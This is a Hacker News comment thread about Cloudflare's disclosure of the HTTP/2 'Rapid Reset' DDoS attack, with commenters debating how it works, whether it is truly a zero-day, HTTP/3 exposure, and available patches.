Hacker News new | past | comments | ask | show | jobs | submit login
HTTP/2 zero-day vulnerability results in record-breaking DDoS attacks (cloudflare.com)
202 points by kayfox 7 months ago | hide | past | favorite | 71 comments



Related ongoing threads:

The novel HTTP/2 'Rapid Reset' DDoS attack - https://news.ycombinator.com/item?id=37830987

The largest DDoS attack to date, peaking above 398M rps - https://news.ycombinator.com/item?id=37831062




So is nginx with http2 enabled vulnerable too? Caddy? I should I not worry about this, because a small (by Cloudflare scale) botnet may DDoS a single server completely anyway?


Go is patching it soon: https://github.com/caddyserver/caddy/issues/5877#issuecommen...

(Caddy just uses Go's HTTP/2 implementation.)


Go patches are out. (1.21.3, 1.20.10)




I'm curious to learn more. How how much work is it to establish a stream and close it? It feels like something that could be done very quickly, but it also involves setting up some state (stream buffers) that could be a problem too.


The cost comes from initiating the request to some backend which presumably starts working on it.


Does HTTP/3 suffer from this kind of complexity bloat?


Well, it requires almost an order of magnitude more energy to serve HTTP/3 than HTTP/1, so maybe?

Why do I say this? Because it breaks nearly every optimization that's been made to serve content efficiently over the last 25 years (sendfile, TSO, kTLS, etc), and requires that the server's CPU touch every byte of data multiple times (rather than never, for http/1). Its basically the "what if I do everything wrong" case in my talk here: https://people.freebsd.org/~gallatin/talks/euro2022.pdf

Given enough time, it may yet get close to HTTP/1. But its still early days.


no it's more efficient in every way, they called it QUIC not SLO


That's why they don't have data centers in San Luis Obispo.


Bit of a leading question since you assuming that this is "complexity bloat" and not just "a feature that people use", but yes, HTTP/3 has streams and so it should be vulnerable.


HTTP/3 is not vulnerable to this specific attack (Rapid Reset), because there it has an extra confirmation step before the sender can create a new stream.

HTTP/2 and HTTP/3 both have a limit on the number of simultaneous streams (requests) the sender may create. In HTTP/2, the sender may create a new stream immediately after sending a reset for an existing one. In HTTP/3, the receiver is responsible for extending the stream limit after a stream closes, so there is backpressure limiting how quickly the sender may create streams.


Thanks. I'm curious to see how the backpressure ends up playing out in terms of "do you need 10k boxes to DoS vs 100k vs not feasible".


> assuming that this is "complexity bloat" and not just "a feature that people use"

¿Por qué no los dos?

:)


Bloat implies that it isn't useful - that it's just dead weight.

If a lot of people use the thing, it must provide some value to them.


Well, to me "bloat" and "useful + used" are incompatible. The feature only made it into HTTP/2 because it saw validation from gRPC, I believe.


A number of people have expressed concerns about making the relatively simple protocol more and more complicated in the name of performance. This looks like it's going to be their "Ha, told you so!" moment.


It reminds me of Meltdown/Spectre: you have a pipe, and instructions need to flow through it in a single file line. Let's increase performance by allowing things to be sent/processed out-of-order!


That's a good example, because it would be an incredibly bad decision to drop speculative execution since it leads to a massive performance improvement.


technically the issue is speculative execution, not superscalar execution (ie. "allowing things to be sent/processed out-of-order!"). Most high performance processors have both, but you can have one without the other.


True, fair point.


My problem is that it often seems like significant complexity is added in order to chase marginal performance gains. I suppose performance is relatively easy to measure while complexity is not.


This seems like a hyperbolic misuse of both “vulnerability” and “zero-day”.


How is it not a vulnerability?


A vulnerability is a flaw in the implementation that allows an attacked to trigger some kind of unexpected result. The result in this case is defined in an RFC. It is 100% working as intended.


A protocol can also have a vulnerability (the term is not constrained to implementation flaws only)


So your contention is that the creators of HTTP/2 intended for all users of it to be DDoSed?


I mean yes, much as http1 allows for people to be ddosed.


What is the vulnerability anyway? I skimmed the linked article twice and could find no explanation of how it works, beyond "request, cancel, request, cancel" and that it's called Rapid Reset. Why is HTTP/2 in particular vulnerable? Are all protocols supporting streams vulnerable? How is it possible to vomit such a long article with so little information?


The article we're discussing has a link to this deeper description: https://blog.cloudflare.com/technical-breakdown-http2-rapid-...


>HTTP/2 protocol — a fundamental protocol that is critical to how the Internet and all websites work

No, it isn't. This whole article seems more like a marketing sales pitch than a disclosure.


I visited a few common sites and they seem to use HTTP/2. I'm not sure the point of arguing it's not fundamental, a cursory glance shows HTTP/1 is bottlenecked by not being able to use the same TCP connection to serve multiple resources (something HTTP/2 fixes)? Is there ire against HTTP/2 adoption, and for what reasons?


I'm not an area expert, but common issues raised over the years:

- HTTP/2 as implemented by browsers requires HTTPS, and some people don't like HTTPS.

- HTTP/2 was "designed by a committee" and has: a lot of features and complexity; most of those features were never implemented by most of the servers/clients; most of those advanced features that were implemented were very naive "checkbox implementations" and/or buggy [0]; some were implemented and then turned out to be more harmful than useful, and got dropped (HTTP/2 push in browsers [1]) etc.

[0] https://github.com/andydavies/http2-prioritization-issues

[1] https://developer.chrome.com/blog/removing-push


Every tech company uses HTTP/2. I'm confused as to what the comment before yours is trying to say, it doesn't seem to be supported by any facts.


http 1.1 connections can be reused, including with pipelining, and it can open multiple sockets to make requests in parallel. http 2 allows out of order responses on one socket. is it worth the complexity? http 1.1 is over 20 years old and battle tested.


Clients stopped using HTTP/1.1 pipelining because it just didn't work well enough.

https://en.wikipedia.org/wiki/HTTP_pipelining#Implementation...


Actually even the diagrams are wrong because they focus on a single connection to explain the problem, carefully omitting the fact that a client can easily open many connections to do the same again. I agree it's mostly marketing and press-releases.


Yes, the attackers will obviously open many connections. In fact, they've always opened as many connections as they have resources for.

But establishing a connection is extremely expensive compared to sending data on an already established channel. With this method they need to open far fewer connections for the same qps.

There's no need to confuse the issue by trying to diagram multiple connections at the same time.


tl;dr HTTP/2 allows clients to DDoS backends much more effectively by using the multiple-stream feature of HTTP/2 to amplify their attack directly inside the reverse proxy (which typically translates HTTP/2 to HTTP/1).

> When Cloudflare's reverse proxies process incoming HTTP/2 client traffic, they copy the data from the connection’s socket into a buffer and process that buffered data in order. As each request is read (HEADERS and DATA frames) it is dispatched to an upstream service. When RST_STREAM frames are read, the local state for the request is torn down and the upstream is notified that the request has been canceled. Rinse and repeat until the entire buffer is consumed. However this logic can be abused: when a malicious client started sending an enormous chain of requests and resets at the start of a connection, our servers would eagerly read them all and create stress on the upstream servers to the point of being unable to process any new incoming request.


> which typically translates HTTP/2 to HTTP/1

Sticking with HTTP/2, or going with grpc/similar is also possible. It depends on which corner of the Internet you inhabit. (Cloudflare isn't the whole Internet, yet)


how on earth did nobody anticipate this kind of attack when designing the protocol? it's very obvious it can be abused like this


It took 8 years for somebody to discover this. It can't have been that obvious.


> It took 8 years for somebody to discover this. It can't have been that obvious.

Actually that's not true, it was already suggested here as a way to circumvent the max_concurrent_streams setting an it seemed particularly obvious: https://lists.w3.org/Archives/Public/ietf-http-wg/2019JanMar...

As soon as you start to implement a proxy that supports H2 on both sides, that's something you immediately spot, because setting too low timeouts on your first stage easily fills the second stage so you have to cover that case.

I think that the reality is in fact that some big corp had several outages due to these attacks and it makes them look better to their customers to say "it's not our fault we had to fight zero-days" than "your service was running on half-baked stacks", so let's just go make a lot of noise about it to announce yet-another-end-of-the-net.


It took eight years for somebody to use this. We don't know when it was discovered (nor how many times by how many different people.)


I remember noticing this from the HTTP/2 RFC, maybe 8y ago. I was studying the head of line blocking issue on a custom protocol atop TCP and was curious to compare with HTTP/2. I think I might even have chatted with a coworker about it at the time, as he was implementing grpc (which uses HTTP/2) in Rust.

It never occured to me that it could be used nefariously!


Not everyone cares about Cloudflare, or even HTTP/2.

The exploit has more to do with their implementation than the protocol.


Google was apparently DOSed by the same sort of attack: https://news.ycombinator.com/item?id=37831062


Meanwhile several different HTTP/2 implementations are dropping fixes for this today.


> The exploit has more to do with their implementation than the protocol.

Is it? I imagine that implementations can do things like make creating/dropping a stream faster but how would an implementation flat out mitigate this?


There is a maximum bandwidth at which data can arrive. Simply make sure you can always process it faster than the next packet can arrive, or implement proper mitigation in cases where you cannot.

It's called programming under soft real-time constraints.


Well yeah, that's just how DoS kinda works with these sorts of vulns. "Be faster" is obviously a good strategy, but is it viable ? Is setting up and canceling a stream something that can be done at GB/s speeds? Maybe, idk.


If you push arbitrary amount of pressure through a pipe that can only handle 1000 psi, you need a valve to release the excess pressure, or it will blow up.

In the real world, pipes cannot put arbitrary pressure, so your constraint is more bounded than this. So if you receive 2000 psi but your pipes can only handle 1000, you just need a small component that can handle the 2000 to split the pressure in two, and you can handle it all without releasing any.

The same applies to digital logic; it's always possible to build something such that you can guarantee processing within a bounded amount of time by optimizing and sizing the resources correctly.

As the word "digital logic" suggests, these sorts of guarantees are more often applied when designing hardware than software, but they can apply to either.


> Simply make sure you can always process it faster than the next packet can arrive

This is pretty much impossible unless you make the client do a proof-of-work so they can't send requests very quickly. Okay, you could use a slow connection so that requests can't arrive very quickly, but then the DoS is upstream.


HTTP/1 between a client-server pair incurs per-request overhead which is not present in HTTP/2. You can do more RPS with less CPU if you use HTTP/2.


You receive an Ethernet frame, you send an Ethernet frame.

The concept of a TCP session is purely virtual, it's just a 16-bit integer in the header grouping the packets together.


OK.


It's pretty similar to HTTP/1 pipelining, though no reverse proxy I'm aware of supports it.


From what I can tell, people were talking about reset flooding that was dated back in July. Not as a novel thing, either. It's just one of several known vulnerabilities, suggesting they've known about this kind of thing for awhile.

https://pentestmag.com/good-bad-and-the-ugly-of-http-2/

I genuinely don't know if this is real a zero day, or if it's a known protocol vulnerability that nobody was mitigating.



Hindsight is 20/20


This is the reason you need a security researcher that is actively exploiting things.


It is but most companies see that as a cost without upside until they get compromised.


This sounds like an IP spoofing issue, it is an IP/layer3 problem where ISPs don't filter spoofed addresses from their users. There sre technical solutions but should also happen is cutting off these ISPs from the internet as a whole when there is a large scale ddos affecting global scale network performance.


No. This is not a ISP problem and the ISP can not solve this - it’s not even visible to the ISP for encrypted connections. This a problem with HTTP/2 itself that web servers / load balancers / proxies need to account for.


You're right. My fault.


This attack just spams requests to a web server. The novel part of the attack is that it also spams packets to cancel those requests to bypass any concurrency limits that may be in place.


Yup, I failed by not actually reading past the first few sentences.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: